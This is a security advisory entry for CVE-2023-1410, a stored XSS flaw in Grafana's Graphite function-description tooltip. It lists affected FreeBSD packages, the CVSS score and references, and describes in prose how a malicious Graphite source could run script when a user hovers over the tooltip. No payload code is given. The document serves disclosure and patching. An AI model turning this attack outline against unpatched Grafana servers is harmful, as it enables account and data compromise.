[FREEBSD:955EB3CC-CE0B-11ED-825F-6C3BE5272ACD] Grafana -- Stored XSS in Graphite FunctionDescription tooltip
Severity
Medium
Affected Packages
3
CVEs
1
Grafana Labs reports:
When a user adds a Graphite data source, they can then use the data source
in a dashboard. This capability contains a feature to use Functions. Once
a function is selected, a small tooltip appears when hovering over the name
of the function. This tooltip allows you to delete the selected Function
from your query or show the Function Description. However, no sanitization
is done when adding this description to the DOM.
Since it is not uncommon to connect to public data sources, an attacker
could host a Graphite instance with modified Function Descriptions containing
XSS payloads. When the victim uses it in a query and accidentally hovers
over the Function Description, an attacker-controlled XSS payload
will be executed.
The severity of this vulnerability is of CVSSv3.1 5.7 Medium
(CVSS: AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:N (5.7)).
Package | Affected Version |
---|---|
pkg:freebsd/grafana9 | < 9.2.15 |
pkg:freebsd/grafana8 | < 8.5.22 |
pkg:freebsd/grafana | < 8.5.22 |
- ID
- FREEBSD:955EB3CC-CE0B-11ED-825F-6C3BE5272ACD
- Severity
- medium
- Severity from
- CVE-2023-1410
- URL
- http://vuxml.freebsd.org/freebsd/955eb3cc-ce0b-11ed-825f-6c3be5272acd.html
- Published
-
2023-03-14T00:00:00
(18 months ago) - Modified
-
2023-03-29T00:00:00
(18 months ago) - Rights
- FreeBSD VuXML Security Team
- Other Advisories
Source | # ID | Name | URL |
---|---|---|---|
FreeBSD VuXML | https://grafana.com/security/security-advisories/cve-2023-1410/ |
# CVE | Description | CVSS | EPSS | EPSS Trend (30 days) | Affected Products | Weaknesses | Security Advisories | Exploits | PoC | Pubblication Date | Modification Date |
---|---|---|---|---|---|---|---|---|---|---|---|
# CVE | Description | CVSS | EPSS | EPSS Trend (30 days) | Affected Products | Weaknesses | Security Advisories | PoC | Pubblication Date | Modification Date |